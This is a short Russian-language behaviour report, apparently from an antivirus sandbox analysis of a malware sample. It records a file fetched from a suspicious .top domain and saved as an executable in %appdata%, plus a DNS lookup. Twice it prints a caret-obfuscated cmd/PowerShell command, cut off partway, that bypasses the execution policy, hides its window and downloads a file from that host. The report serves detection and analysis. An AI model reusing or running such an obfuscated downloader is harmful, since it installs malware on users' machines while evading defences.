Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWERShe^l^l.ex^e ^-^E^X^EcutIOnPol^I^CY b^yPass -^N^opRo^FIlE^ ^-^w^indOw^Style^ ^h^i^d^de^N (^nE^W^-^ob^Je^ct ^Sys^t^E^M.neT.W^EbC^LieNT^).^d^O^WnlOadfI^le^('http://www.doo...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "POWERShe^l^l.ex^e ^-^E^X^EcutIOnPol^I^CY b^yPass -^N^opRo^FIlE^ ^-^w^indOw^Style^ ^h^i^d^de^N (^nE^W^-^ob^Je^ct ^Sys^t^E^M.neT.W^EbC^LieNT^).^d^O^WnlOadfI^le^('http://www.doo...' (со скрытым окном)